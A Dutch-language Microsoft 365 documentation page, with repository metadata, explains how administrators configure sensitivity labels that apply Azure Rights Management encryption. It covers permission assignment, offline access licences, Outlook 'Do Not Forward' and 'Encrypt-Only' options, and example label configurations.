] | null | null | null | microsoft-365/compliance/encryption-sensitivity-labels.md | MicrosoftDocs/microsoft-365-docs-pr.nl-NL | 6e5ca6bfc9713df2e28347bd1ca1c86d38113afb | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-03-14T23:50:07.000Z | 2021-08-19T14:14:01.000Z | ---
title: Toegang tot inhoud beperken door versleuteling toe te passen met vertrouwelijkheidslabels
f1.keywords:
- NOCSH
ms.author: cabailey
author: cabailey
manager: laurawi
audience: Admin
ms.topic: article
ms.service: O365-seccomp
ms.localizationpriority: high
ms.collection:
- M365-security-compliance
search.appverid:
- MOE150
- MET150
description: Configureer vertrouwelijkheidslabels voor versleuteling die uw gegevens beschermen door de toegang en het gebruik te beperken.
ms.custom: seo-marvel-apr2020
ms.openlocfilehash: 05e09bbd07bb8b4d15ce9bb82b64f49b49d88ffd
ms.sourcegitcommit: be095345257225394674698beb3feeb0696ec86d
ms.translationtype: HT
ms.contentlocale: nl-NL
ms.lasthandoff: 10/08/2021
ms.locfileid: "60239958"
---
# <a name="restrict-access-to-content-by-using-sensitivity-labels-to-apply-encryption"></a>Toegang tot inhoud beperken door versleuteling toe te passen met vertrouwelijkheidslabels
>*[Richtlijnen voor Microsoft 365-licenties voor beveiliging en compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance).*
Wanneer u een vertrouwelijkheidslabel maakt, kunt u de toegang beperken tot inhoud waarop het label wordt toegepast. Met de versleutelingsinstellingen voor een vertrouwelijkheidslabel kunt u bijvoorbeeld inhoud beveiligen zodat:
- Alleen gebruikers binnen uw organisatie een vertrouwelijk document of e-mailbericht kunnen openen;
- Alleen gebruikers van de marketingafdeling het document of het e-mailbericht voor promotieaankondiging kunnen bewerken en afdrukken, terwijl alle overige gebruikers in uw organisatie het alleen kunnen lezen;
- Gebruikers geen e-mailberichten kunnen doorsturen of er gegevens van kopiëren die nieuws over een interne organisatie bevatten;
- De huidige prijslijst die naar zakenpartners wordt verzonden, niet kan worden geopend na een opgegeven datum.
Wanneer een document of e-mailbericht is versleuteld, wordt de toegang tot de inhoud beperkt, zodat het:
- Alleen kan worden ontsleuteld door gebruikers die zijn geautoriseerd door de versleutelingsinstellingen van het label;
- Het versleuteld blijft, ongeacht waar het zich bevindt, binnen of buiten uw organisatie, ook als de naam van het bestand is gewijzigd;
- Zowel at rest (bijvoorbeeld in een OneDrive-account) als tijdens het verzenden is versleuteld (bijvoorbeeld e-mail tijdens de reis via internet).
Ten slotte kunt u, als beheerder, bij het configureren van een vertrouwelijkheidslabel voor het toepassen van versleuteling een van de volgende keuzes maken:
- **Nu machtigingen toewijzen**, zodat u precies kunt bepalen welke gebruikers welke machtigingen voor inhoud met dat label krijgen.
- **Gebruikers machtigingen laten toewijzen** wanneer ze het label op inhoud toepassen. Op deze manier kunt u personen in uw organisatie enige flexibiliteit bieden die ze mogelijk nodig hebben om samen te werken en hun werk af te krijgen.
De versleutelingsinstellingen zijn beschikbaar wanneer u [een vertrouwelijkheidslabel maakt](create-sensitivity-labels.md) in het Microsoft 365-compliancecentrum. U kunt ook de oudere portal gebruiken, het beveiligings- en compliancecentrum.
## <a name="understand-how-the-encryption-works"></a>Inzicht in versleuteling
Versleuteling maakt gebruik van de Azure Rights Management-service (Azure RMS) van Azure Information Protection. Deze beveiligingsoplossing maakt gebruik van versleutelings-, identiteits- en autorisatiebeleid. Zie [Wat is Azure Rights Management?](/azure/information-protection/what-is-azure-rms) in de documentatie van Azure Information Protection voor meer informatie.
Wanneer u deze versleutelingsoplossing gebruikt, zorgt de functie **supergebruiker** ervoor dat geautoriseerde personen en services altijd de gegevens kunnen lezen en controleren die voor uw organisatie zijn versleuteld. De versleuteling kan vervolgens eventueel worden verwijderd of gewijzigd. Zie [Supergebruikers configureren voor Azure Information Protection en discoveryservices of gegevensherstel](/azure/information-protection/configure-super-users) voor meer informatie.
## <a name="important-prerequisites"></a>Belangrijke vereisten
Voordat u versleuteling kunt gebruiken, moet u mogelijk enkele configuratietaken uitvoeren. Wanneer u versleutelingsinstellingen configureert, wordt er niet gecontroleerd of aan deze vereisten wordt voldaan.
- Beveiliging activeren vanuit Azure Information Protection
Als u met vertrouwelijkheidslabels versleuteling wilt toepassen, moet de beveiligingsservice (Azure Rights Management) van Azure Information Protection voor uw tenant worden geactiveerd. In nieuwere tenants is dit de standaardinstelling, maar mogelijk moet u de service handmatig activeren. Zie [Beveiligingsservice activeren vanuit Azure Information Protection](/azure/information-protection/activate-service) voor meer informatie.
- Controleren op netwerkvereisten
Mogelijk moet u enkele wijzigingen aanbrengen op uw netwerkapparaten, zoals firewalls. Zie voor meer informatie [Firewalls en netwerkinfrastructuur](/azure/information-protection/requirements#firewalls-and-network-infrastructure) in de documentatie van Azure Information Protection.
- Exchange voor Azure Information Protection configureren
Exchange hoeft niet te worden geconfigureerd voor Azure Information Protection voordat gebruikers labels in Outlook kunnen toepassen om hun e-mailberichten te versleutelen. Totdat Exchange is geconfigureerd voor Azure Information Protection, beschikt u echter niet over de volledige functionaliteit van het gebruik van Azure Rights Management Protection voor Exchange.
Gebruikers kunnen bijvoorbeeld geen versleutelde e-mailberichten bekijken op mobiele telefoons of met de webversie van Outlook. Versleutelde e-mailberichten kunnen niet worden geïndexeerd voor zoekopdrachten en u kunt Exchange Online DLP niet configureren voor Azure Rights Management Protection.
Zie de volgende informatie om ervoor te zorgen dat Exchange ondersteuning biedt voor deze aanvullende scenario's:
- Voor Exchange Online bekijkt u de instructies voor [Exchange Online: IRM-configuratie](/azure/information-protection/configure-office365#exchangeonline-irm-configuration).
- Voor on-premises Exchange moet u de [RMS-connector en uw Exchange-servers configureren](/azure/information-protection/deploy-rms-connector).
## <a name="how-to-configure-a-label-for-encryption"></a>Een label configureren voor versleuteling
1. Volg de algemene instructies om [een vertrouwelijkheidslabel te maken of te bewerken](create-sensitivity-labels.md#create-and-configure-sensitivity-labels) en zorg ervoor dat u **Bestanden en e-mailberichten** selecteert voor het bereik van het label:

2. Selecteer vervolgens op de pagina **Beveiligingsinstellingen voor bestanden en e-mailberichten kiezen** de optie **Bestanden en e-mailberichten versleutelen**.

4. Selecteer op de pagina **Versleuteling** een van de volgende opties:
- **Versleuteling verwijderen als het bestand is versleuteld**: deze optie wordt alleen ondersteund door de geïntegreerde labelclient van Azure Information Protection. Wanneer u deze optie selecteert en ingebouwde labeling gebruikt, wordt het label mogelijk niet weergegeven in apps of wordt het label niet weergegeven en worden er geen versleutelingswijzigingen aangebracht.
Zie voor meer informatie over dit scenario de sectie [Wat gebeurt er met bestaande versleuteling wanneer een label wordt toegepast](#what-happens-to-existing-encryption-when-a-labels-applied). Het is belangrijk om te weten dat deze instelling ertoe kan leiden dat een vertrouwelijkheidslabel mogelijk niet meer kan worden toegepast wanneer een gebruiker over onvoldoende machtigingen beschikt.
- **Versleutelingsinstellingen configureren**: hiermee schakelt u versleuteling in en worden de versleutelingsinstellingen zichtbaar:

Instructies voor deze instellingen staan in de volgende sectie: [Versleutelingsinstellingen configureren](#configure-encryption-settings).
### <a name="what-happens-to-existing-encryption-when-a-labels-applied"></a>Wat gebeurt er met de bestaande versleuteling wanneer er een label wordt toegepast?
Als een vertrouwelijkheidslabel wordt toegepast op niet-versleutelde inhoud, spreekt het vanzelf wat het resultaat is van de versleutelingsopties die u kunt selecteren. Als u bijvoorbeeld **Bestanden en e-mailberichten versleutel** niet hebt geselecteerd, blijft de inhoud onversleuteld.
Het is echter mogelijk dat de inhoud al is versleuteld. Een andere gebruiker kan bijvoorbeeld het volgende hebben toegepast:
- Zijn of haar eigen machtigingen, waaronder door de gebruiker gedefinieerde machtigingen wanneer hierom voor een label wordt verzocht, aangepaste machtigingen door de Azure Information Protection-client en de documentbeveiliging **Beperkte toegang** vanuit een Office-app;
- Een Azure Rights Management-beveiligingssjabloon die de inhoud onafhankelijk van een label versleutelt. Deze categorie bevat regels voor de e-mailstroom die versleuteling toepassen met behulp van rechtenbescherming.
- Een label dat versleuteling toepast met machtigingen die door de beheerder zijn toegewezen.
In de volgende tabel wordt aangegeven wat er gebeurt met bestaande versleuteling wanneer een vertrouwelijkheidslabel op die inhoud wordt toegepast:
| | Versleuteling: niet geselecteerd | Versleuteling: geconfigureerd | Versleuteling: verwijderen <sup>\*</sup> |
|:-----|:-----|:-----|:-----|
|**Door een gebruiker opgegeven machtigingen**|Oorspronkelijke versleuteling blijft behouden|Er wordt nieuwe labelversleuteling toegepast|Oorspronkelijke versleuteling wordt verwijderd|
|**Beveiligingssjabloon**|Oorspronkelijke versleuteling blijft behouden|Er wordt nieuwe labelversleuteling toegepast|Oorspronkelijke versleuteling wordt verwijderd|
|**Label met door een beheerder gedefinieerde machtigingen**|Oorspronkelijke versleuteling wordt verwijderd|Er wordt nieuwe labelversleuteling toegepast|Oorspronkelijke versleuteling wordt verwijderd|
**Voetnoot:**
<sup>\*</sup> Ondersteund door de geïntegreerde labelclient van Azure Information Protection.
Houd er rekening mee dat wanneer de nieuwe labelversleuteling wordt toegepast of de oorspronkelijke versleuteling wordt verwijderd, dit alleen gebeurt als de gebruiker die het label toepast, een gebruiksrecht of rol heeft waarmee deze actie wordt ondersteund:
- Het [gebruiksrecht](/azure/information-protection/configure-usage-rights#usage-rights-and-descriptions) Exporteren of Volledig beheer.
- De rol [Rights Management-uitgever of Rights Management-eigenaar](/azure/information-protection/configure-usage-rights#rights-management-issuer-and-rights-management-owner) of [supergebruiker](/azure/information-protection/configure-super-users).
Als de gebruiker een van deze rechten of rollen niet heeft, kan het label niet worden toegepast en blijft de oorspronkelijke versleuteling dus behouden. De gebruiker ziet het volgende bericht: **U bent niet gemachtigd deze wijziging aan het vertrouwelijkheidslabel aan te brengen. Neem contact op met de eigenaar van de inhoud.**
Bijvoorbeeld: de persoon die Niet doorsturen op een e-mailbericht toepast, kan de thread opnieuw labelen om de versleuteling te vervangen of te verwijderen, omdat deze persoon het beheer van rechten voor het e-mailbericht heeft. Maar met uitzondering van supergebruikers kunnen geadresseerden van dit e-mailbericht dit niet opnieuw labelen omdat ze niet over de vereiste gebruiksrechten beschikken.
#### <a name="email-attachments-for-encrypted-email-messages"></a>E-mailbijlagen voor versleutelde e-mailberichten
Wanneer een e-mailbericht door een willekeurige methode wordt versleuteld, nemen niet-versleutelde Office-documenten die aan het e-mailbericht zijn gekoppeld, automatisch dezelfde versleutelingsinstellingen over.
Documenten die al zijn versleuteld en vervolgens als bijlage worden toegevoegd, behouden altijd de oorspronkelijke versleuteling.
## <a name="configure-encryption-settings"></a>Versleutelingsinstellingen configureren
Wanneer u op de pagina **Versleuteling** **Versleutelingsinstellingen configureren** selecteert om een vertrouwelijkheidslabel te maken of te bewerken, kiest u een van de volgende opties:
- **Nu machtigingen toewijzen**, zodat u precies kunt bepalen welke gebruikers welke machtigingen krijgen voor inhoud waarop dat label is toegepast. Zie de volgende sectie, [Nu machtigingen toewijzen](#assign-permissions-now), voor meer informatie.
- **Gebruikers machtigingen laten toewijzen** wanneer de gebruikers het label op inhoud toepassen. Met deze optie kunt u personen in uw organisatie enige flexibiliteit bieden die ze mogelijk nodig hebben om samen te werken en hun werk af te krijgen. Zie de sectie [Gebruikers machtigingen laten toewijzen](#let-users-assign-permissions) op deze pagina voor meer informatie.
Als u bijvoorbeeld een vertrouwelijkheidslabel met de naam **Zeer vertrouwelijk** hebt, dat wordt toegepast op de meest gevoelige inhoud, wilt u mogelijk nu beslissen wie welk type machtigingen voor die inhoud krijgt.
Maar als u een vertrouwelijkheidslabel hebt met de naam **Zakelijke contracten** en de werkstroom van uw organisatie vereist dat uw personen op ad-hocbasis met verschillende personen aan deze inhoud samenwerken, wilt u uw gebruikers mogelijk laten bepalen wie machtigingen krijgt wanneer ze het label toewijzen. Deze flexibiliteit bevordert de productiviteit van uw gebruikers en vermindert de verzoeken bij uw beheerders om voor specifieke scenario's nieuwe vertrouwelijkheidslabels bij te werken of te maken.
Kiezen of u nu machtigingen wilt toewijzen of gebruikers machtigingen wilt laten toewijzen:

## <a name="assign-permissions-now"></a>Nu machtigingen toewijzen
Gebruik de volgende opties om te bepalen wie toegang heeft tot e-mail of documenten waarop dit label wordt toegepast. U kunt:
- **Toegang tot gelabelde inhoud laten verlopen**, op een bepaalde datum of na een bepaald aantal dagen nadat het label is toegepast. Na deze periode kunnen gebruikers het gelabelde item niet meer openen. Als u een datum opgeeft, wordt deze van kracht op die datum om twaalf uur 's nachts in uw huidige tijdzone. (Houd er rekening mee dat sommige e-mailclients geen vervaldatum afdwingen en e-mailberichten ook na de vervaldatum tonen als gevolg van de wijze waarop caching is ingesteld.)
- **Offlinetoegang toestaan**: nooit, altijd of op een bepaald aantal dagen nadat het label is toegepast. Als u offlinetoegang altijd of voor een aantal dagen beperkt, moeten gebruikers opnieuw worden aangemeld wanneer deze drempelwaarde is bereikt, en wordt hun toegang geregistreerd. Zie de volgende sectie over de gebruikslicentie voor Rights Management voor meer informatie.
Instellingen voor toegangsbeheer voor versleutelde inhoud:

### <a name="rights-management-use-license-for-offline-access"></a>Rights Management-gebruikslicentie voor offlinetoegang
Wanneer een gebruiker een document of e-mailbericht opent dat is beveiligd met versleuteling door de Azure Rights Management-service, wordt een Azure Rights Management-gebruikslicentie voor die inhoud aan de gebruiker verleend. Deze gebruikslicentie is een certificaat dat de gebruiksrechten van de gebruiker voor het document of e-mailbericht bevat. De licentie bevat tevens de versleutelingssleutel die is gebruikt om de inhoud te versleutelen. Voor de gebruikslicentie kan ook een vervaldatum worden ingesteld en de periode gedurende welke de gebruikslicentie geldig is.
Als er geen vervaldatum voor de gebruikslicentie is ingesteld, bedraagt de standaardtermijn voor een tenant dertig dagen. Voor de duur van de gebruikslicentie wordt de gebruiker niet opnieuw voor de inhoud geverifieerd of geautoriseerd. Hierdoor kan de gebruiker het beveiligde document of e-mailbericht zonder internetverbinding gedurende die periode openen. Wanneer de geldigheidsperiode van de gebruikslicentie verloopt, moet de gebruiker de volgende keer dat de hij of zij het beveiligde document of e-mailbericht opent, opnieuw worden geverifieerd en geautoriseerd.
Naast de herauthenticatie, de versleutelingsinstellingen en het abonnement voor de gebruikersgroep worden opnieuw geëvalueerd. Dit betekent dat voor gebruikers verschillende manieren van toegang kunnen gelden voor hetzelfde document of dezelfde e-mail als de versleutelingsinstellingen of het groepslidmaatschap zijn gewijzigd vanaf het moment dat ze de inhoud voor het laatst hebben gebruikt.
Zie [Rights Management-gebruikslicentie](/azure/information-protection/configure-usage-rights#rights-management-use-license) voor informatie over het wijzigen van de standaardinstelling van dertig dagen.
### <a name="assign-permissions-to-specific-users-or-groups"></a>Machtigingen toewijzen aan specifieke gebruikers en groepen
U kunt machtigingen verlenen aan bepaalde personen, zodat alleen zij met de gelabelde inhoud kunnen werken:
1. Voeg eerst gebruikers of groepen toe die machtigingen toegewezen krijgen voor de gelabelde inhoud.
2. Kies vervolgens welke machtigingen deze gebruikers voor de gelabelde inhoud moeten hebben.
Machtigingen toewijzen:

#### <a name="add-users-or-groups"></a>Gebruikers of groepen toevoegen
Wanneer u machtigingen toewijst, kunt u kiezen uit de volgende opties:
- Iedereen in uw organisatie (alle tenantleden). Met deze instelling worden gastaccounts uitgesloten.
- Alle geverifieerde gebruikers. Zorg ervoor dat u de [vereisten en beperkingen](#requirements-and-limitations-for-add-any-authenticated-users) van deze instelling begrijpt voordat u deze selecteert.
- Elke specifieke gebruikers- of door e-mail ingeschakelde beveiligingsgroep, distributiegroep of Microsoft 365-groep ([voorheen Office 365-groep](https://techcommunity.microsoft.com/t5/microsoft-365-blog/office-365-groups-will-become-microsoft-365-groups/ba-p/1303601)) in Azure AD. De Microsoft 365-groep kan een statisch of [dynamische lidmaatschap](/azure/active-directory/users-groups-roles/groups-create-rule) hebben. Houd er rekening mee dat u geen [dynamische distributiegroep van Exchange](/Exchange/recipients/dynamic-distribution-groups/dynamic-distribution-groups) kunt gebruiken omdat dit groepstype niet wordt gesynchroniseerd met Azure AD en u geen beveiligingsgroep kunt gebruiken die niet door e-mail is ingeschakeld.
- Een willekeurig e-mailadres of domein. Gebruik deze optie om alle gebruikers in een andere organisatie die van Azure AD gebruikmaken, op te geven door een domeinnaam uit die organisatie in te voeren. U kunt deze optie ook gebruiken voor sociale providers door de domeinnaam ervan in te voeren, bijvoorbeeld **gmail.com**, **hotmail.com** of **outlook.com**.
> [!NOTE]
> Als u een domein opgeeft van een organisatie die gebruikmaakt van Azure AD, kunt u de toegang tot dat specifieke domein niet beperken. In plaats daarvan worden alle geverifieerde domeinen in Azure AD automatisch opgenomen voor de tenant die eigenaar is van de domeinnaam die u opgeeft.
Wanneer u alle gebruikers en groepen in uw organisatie kiest of door de adreslijst bladert, moeten de gebruikers of groepen een e-mailadres hebben.
U kunt het beste groepen gebruiken in plaats van gebruikers. Met deze strategie houdt u de configuratie eenvoudiger.
##### <a name="requirements-and-limitations-for-add-any-authenticated-users"></a>Vereisten en limieten voor Geverifieerde gebruikers toevoegen
Deze instelling beperkt niet wie toegang heeft tot de inhoud die door het label wordt versleuteld. De inhoud wordt nog wel versleuteld en u hebt opties waarmee u kunt beperken hoe de inhoud kan worden gebruikt (machtigingen) en geopend (met vervaldatum en offlinetoegang). De toepassing waarmee de versleutelde inhoud wordt geopend, moet echter wel ondersteuning bieden voor de gebruikte wijze van verificatie. Vandaar dat federatieve sociale providers, zoals Google en eenmalige wachtwoordverificatie, alleen voor e-mail werken en alleen wanneer u Exchange Online gebruikt. Microsoft-accounts kunnen worden gebruikt met Office 365-apps en de [Azure Information Protection-viewer](https://portal.azurerms.com/#/download).
> [!NOTE]
> U kunt deze instelling gebruiken met [SharePoint- en OneDrive-integratie met Azure AD B2B](/sharepoint/sharepoint-azureb2b-integration-preview) wanneer vertrouwelijkheidslabels zijn [ingeschakeld voor Office-bestanden in SharePoint en OneDrive](sensitivity-labels-sharepoint-onedrive-files.md).
Enkele gebruikelijke scenario's voor de instelling Alle geverifieerde gebruikers:
- Het maakt niet uit wie de inhoud bekijkt, maar u wilt beperken hoe deze wordt gebruikt. U wilt bijvoorbeeld niet dat de inhoud wordt bewerkt, gekopieerd of afgedrukt.
- U hoeft niet te beperken wie toegang heeft tot de inhoud, maar u wilt wel kunnen bevestigen wie de inhoud opent.
- U hebt een vereiste dat de inhoud at rest en tijdens het verzenden moet zijn versleuteld, maar dat er geen toegangscontroles nodig zijn.
#### <a name="choose-permissions"></a>Machtigingen kiezen
Wanneer u kiest welke machtigingen u wilt toestaan voor deze gebruikers of groepen, kunt u een van de volgende opties selecteren:
- Een [vooraf gedefinieerd machtigingsniveau](/azure/information-protection/configure-usage-rights#rights-included-in-permissions-levels) met een vooraf ingestelde groep rechten, zoals Cocreatie of Revisor.
- Aangepaste machtigingen, waarbij u een of meer gebruiksrechten kiest.
Zie [Gebruiksrechten en beschrijvingen](/azure/information-protection/configure-usage-rights#usage-rights-and-descriptions) voor meer informatie om de juiste machtigingen te selecteren.

Houd er rekening mee dat met hetzelfde label verschillende machtigingen aan verschillende gebruikers kunnen worden verleend. Met één label kunnen bepaalde gebruikers bijvoorbeeld worden toegewezen als revisor en een andere gebruiker als medeauteur, zoals weergegeven in de volgende schermafbeelding.
U doet dit door gebruikers of groepen toe te voegen, ze machtigingen toe te wijzen en deze instellingen op te slaan. Herhaal deze stappen door elke keer gebruikers toe te voegen en machtigingen toe te wijzen en de instellingen op te slaan. U kunt deze configuratie zo vaak als nodig herhalen om verschillende machtigingen voor verschillende gebruikers te definiëren.

#### <a name="rights-management-issuer-user-applying-the-sensitivity-label-always-has-full-control"></a>De Rights Management-uitgever (gebruiker die het vertrouwelijkheidslabel toepast) heeft altijd Volledig beheer
Versleuteling voor een vertrouwelijkheidslabel maakt gebruik van de Azure Rights Management-service van Azure Information Protection. Wanneer een gebruiker een vertrouwelijkheidslabel gebruikt om een document of e-mailbericht met versleuteling te beveiligen, wordt die gebruiker de Rights Management-uitgever voor die inhoud.
De Rights Management-uitgever worden altijd machtigingen verleend voor volledig beheer voor het document of e-mailbericht, en daarnaast:
- Als de versleutelingsinstellingen een vervaldatum bevatten, kan de Rights Management-uitgever het document of e-mailbericht na die datum nog steeds openen en bewerken.
- De Rights Management-uitgever heeft altijd offlinetoegang tot het document of het e-mailbericht.
- De Rights Management-uitgever kan een document openen ook nadat het is ingetrokken.
Zie [Rights Management-uitgever en Rights Management-eigenaar](/azure/information-protection/configure-usage-rights#rights-management-issuer-and-rights-management-owner) voor meer informatie.
### <a name="double-key-encryption"></a>Dubbele sleutelcodering
> [!NOTE]
> Deze functie wordt momenteel alleen ondersteund door de geïntegreerde Azure Information Protection-labelclient.
Selecteer deze optie pas nadat u de dubbele sleutelcoderingsservice hebt geconfigureerd en u deze dubbele sleutelversleuteling wilt gebruiken voor bestanden waar dit label op wordt toegepast.
Zie [Dubbele sleutelcodering (DKE)](double-key-encryption.md) voor meer informatie, vereisten en configuratie-instructies.
## <a name="let-users-assign-permissions"></a>Gebruikers machtigingen laten toewijzen
> [!IMPORTANT]
> Niet alle labelclients ondersteunen alle opties die gebruikers in staat stellen hun eigen machtigingen toe te wijzen. Raadpleeg deze sectie voor meer informatie.
U kunt de volgende opties gebruiken om gebruikers machtigingen te laten toewijzen wanneer ze handmatig een vertrouwelijkheidslabel op inhoud toepassen:
- In Outlook kan een gebruiker beperkingen selecteren die vergelijkbaar zijn met de optie [Niet doorsturen](/azure/information-protection/configure-usage-rights#do-not-forward-option-for-emails) of [Alleen-versleutelen](/azure/information-protection/configure-usage-rights#encrypt-only-option-for-emails) voor de gekozen geadresseerden.
De optie Niet doorsturen wordt ondersteund door alle e-mailclients die vertrouwelijkheidslabels ondersteunen. Het toepassen van de optie **Alleen-versleutelen** met een gevoeligheidslabel is echter een recente versie die alleen wordt ondersteund door ingebouwd labelen en niet door de geïntegreerde Azure Information Protection-labelclient. Voor e-mailclients die deze mogelijkheid niet ondersteunen, is het label niet zichtbaar.
Als u de minimale versies van Outlook-apps wilt controleren die gebruikmaken van ingebouwd labelen ter ondersteuning van de optie Alleen versleutelen in combinatie met een vertrouwelijkheidslabel, gebruikt u de [tabel met mogelijkheden voor Outlook](sensitivity-labels-office-apps.md#sensitivity-label-capabilities-in-outlook) en de rij **Gebruikers machtigingen laten toewijzen: - Alleen-versleutelen**.
- In Word, PowerPoint en Excel wordt een gebruiker gevraagd om zijn of haar eigen machtigingen te selecteren voor specifieke gebruikers, groepen of organisaties.
Deze optie wordt ondersteund door de geïntegreerde Azure Information Protection-labelclient en door sommige apps die gebruikmaken van ingebouwd labelen. Voor apps die deze mogelijkheid niet ondersteunen, is het label niet zichtbaar voor gebruikers of is het label zichtbaar voor consistentie, maar kan het niet met een verklaring voor gebruikers worden toegepast.
Als u wilt controleren welke apps die gebruikmaken van ingebouwd labelen deze optie ondersteunen, gebruikt u de [tabel met mogelijkheden voor Word, Excel en PowerPoint](sensitivity-labels-office-apps.md#sensitivity-label-capabilities-in-word-excel-and-powerpoint) en de rij **Gebruikers machtigingen laten toewijzen: - Gebruikers vragen**.
Wanneer de opties worden ondersteund, gebruikt u de volgende tabel om te erachter te komen wanneer gebruikers het gevoeligheidslabel zien:
|Instelling |Label zichtbaar in Outlook|Label zichtbaar in Word, Excel, PowerPoint|
|:-----|:-----|:-----|:-----|
|**In Outlook beperkingen afdwingen met de optie Niet doorsturen of Alleen-versleutelen**|Ja |Nee |
|**In Word, PowerPoint en Excel gebruikers vragen om machtigingen op te geven**|Nee |Ja|
Als beide instellingen zijn geselecteerd, is het label dus zichtbaar in zowel Outlook als Word, Excel en PowerPoint.
Een vertrouwelijkheidslabel waarmee gebruikers machtigingen kunnen toewijzen, moet handmatig door gebruikers op inhoud worden toegepast. Het kan niet automatisch worden toegepast of gebruikt als een aanbevolen label.
De door de gebruiker toegewezen machtigingen configureren:

### <a name="outlook-restrictions"></a>Outlook-beperkingen
Wanneer een gebruiker in Outlook een vertrouwelijkheidslabel toewijst waarmee machtigingen aan een bericht kunnen worden toegewezen, kunt u de optie **Niet doorsturen** of **Alleen-versleutelen** kiezen. De gebruiker ziet de naam en beschrijving van het label boven aan het bericht, wat erop wijst dat de inhoud wordt beveiligd. In tegenstelling tot in Word, PowerPoint en Excel (zie [volgende sectie](#word-powerpoint-and-excel-permissions)), wordt gebruikers niet gevraagd om specifieke machtigingen te selecteren.

Wanneer een van deze opties op een e-mailbericht wordt toegepast, wordt het bericht versleuteld en moeten geadresseerden worden geverifieerd. De geadresseerden hebben vervolgens automatisch rechten voor beperkt gebruik:
- **Niet doorsturen**: geadresseerden kunnen het e-mailbericht niet doorsturen, afdrukken of kopiëren. In de Outlook-client is bijvoorbeeld de knop Doorsturen niet beschikbaar, zijn de menuopties Opslaan als en Afdrukken niet beschikbaar en kunt u geen geadresseerden toevoegen of wijzigen in de vakken Aan, CC of BCC.
Zie [Optie Niet doorsturen voor e-mailberichten](/azure/information-protection/configure-usage-rights#do-not-forward-option-for-emails) voor meer informatie over hoe deze optie werkt.
- **Alleen-versleutelen**: geadresseerden hebben alle gebruiksrechten, behalve Opslaan als, Exporteren en Volledig beheer. Deze combinatie van gebruiksrechten betekent dat de geadresseerden geen beperkingen hebben, behalve dat ze de beveiliging niet kunnen verwijderen. Een geadresseerde kan bijvoorbeeld kopiëren uit het e-mailbericht, het bericht afdrukken en doorsturen.
Zie [Optie Alleen-versleutelen voor e-mailberichten](/azure/information-protection/configure-usage-rights#encrypt-only-option-for-emails) voor meer informatie over hoe deze optie werkt.
Niet-versleutelde Office-documenten die aan het e-mailbericht zijn bijgevoegd, nemen automatisch dezelfde beperkingen over. Voor Niet doorsturen zijn de gebruiksrechten die op deze documenten worden toegepast: Inhoud bewerken, Bewerken, Opslaan, Weergeven, Openen, Lezen en Macro's toestaan. Als de gebruiker andere gebruiksrechten voor een bijlage wil hebben of als de bijlage geen Office-document is dat deze overgenomen beveiliging ondersteunt, moet de gebruiker het bestand versleutelen voordat het aan het e-mailbericht wordt toegevoegd.
### <a name="word-powerpoint-and-excel-permissions"></a>Machtigingen voor Word, PowerPoint en Excel
Wanneer een gebruiker in Word, PowerPoint of Excel een vertrouwelijkheidslabel toewijst waarmee de gebruiker machtigingen aan een document kan toewijzen, wordt hem of haar naar de keuze voor de gebruikers en machtigingen gevraagd wanneer de versleuteling wordt toegepast.
Voor bijvoorbeeld de geïntegreerde Azure Information Protection-labelclient kunnen gebruikers het volgende doen:
- Een machtigingsniveau selecteren, bijvoorbeeld Viewer (waarmee de machtiging Alleen weergeven wordt toegewezen) of Cocreatie (waarmee de machtigingen Weergeven, Bewerken, Kopiëren en Afdrukken worden toegewezen).
- Selecteer gebruikers, groepen of organisaties. Dit kunnen personen binnen of buiten uw organisatie zijn.
- Stel een vervaldatum in, waarna de geselecteerde gebruikers geen toegang tot de inhoud hebben. Zie de bovenstaande sectie, [Rights Management-gebruikerslicentie voor offlinetoegang](#rights-management-use-license-for-offline-access) voor meer informatie.

Voor ingebouwd labelen zien gebruikers hetzelfde dialoogvenster als ze het volgende selecteren:
- Windows: tabblad **Bestand** > **Info** > **Document beveiligen** > **Toegang beperken** > **Beperkte toegang**
- macOS: tabblad **Controle** > **Bescherming** > **Machtigingen** > **Beperkte toegang**
## <a name="example-configurations-for-the-encryption-settings"></a>Voorbeeldconfiguraties voor de versleutelingsinstellingen
Voor elk voorbeeld dat volgt, voert u de configuratie uit op de pagina **Versleuteling** wanneer **Versleutelingsinstellingen configureren** is geselecteerd:

### <a name="example-1-label-that-applies-do-not-forward-to-send-an-encrypted-email-to-a-gmail-account"></a>Voorbeeld 1: label dat Niet doorsturen toepast om een versleuteld e-mailbericht naar een Gmail-account te verzenden
Dit label wordt alleen weergegeven in Outlook en de webversie van Outlook, en u moet Exchange Online gebruiken. Laat gebruikers dit label selecteren wanneer ze een versleuteld e-mailbericht willen verzenden naar personen met een Gmail-account (of een ander e-mailaccount buiten uw organisatie).
De gebruikers typen het Gmail-adres in het vak **Aan**. Vervolgens selecteren ze het label en wordt de optie Niet doorsturen automatisch toegevoegd aan het e-mailbericht. Het resultaat daarvan is dat geadresseerden het e-mailbericht niet kunnen doorsturen of afdrukken, er niet uit kunnen kopiëren of buiten hun postvak kunnen opslaan met behulp van de optie **Opslaan als**.
1. Op de pagina **Versleuteling**: voor **Machtigingen nu toewijzen of gebruikers laten beslissen?** selecteert u **Gebruikers machtigingen laten toewijzen wanneer ze het label toepassen**.
2. Schakel het selectievakje **In Outlook beperkingen afdwingen die vergelijkbaar zijn met de optie Niet doorsturen** in.
3. Indien geselecteerd, schakelt u het selectievakje **In Word, PowerPoint en Excel gebruikers vragen om machtigingen op te geven** in.
4. Selecteer **Volgende** en voltooi de configuratie.
### <a name="example-2-label-that-restricts-read-only-permission-to-all-users-in-another-organization"></a>Voorbeeld 2: label dat alleen-lezenmachtigingen beperkt voor alle gebruikers in een andere organisatie
Dit label is geschikt voor het delen van zeer gevoelige documenten als alleen-lezen, en de documenten hebben altijd een internetverbinding nodig om ze te bekijken.
Dit label is niet geschikt voor e-mailberichten.
1. Op de pagina **Versleuteling**: voor **Machtigingen nu toewijzen of gebruikers laten beslissen?** selecteert u **Machtigingen nu toewijzen**.
2. Voor **Offlinetoegang toestaan** selecteert u **Nooit**.
3. Selecteer **Machtigingen toewijzen**.
4. In het deelvenster **Machtigingen toewijzen** selecteert u **Specifieke e-mailadressen of domeinen toevoegen**.
5. Voer in het tekstvak de naam in van een domein van de andere organisatie, bijvoorbeeld **fabrikam.com**. Selecteer vervolgens **Toevoegen**.
6. Selecteer **Machtigingen kiezen**.
7. In het deelvenster **Machtigingen kiezen** selecteert u de vervolgkeuzelijst, vervolgens **Viewer** en **Opslaan**.
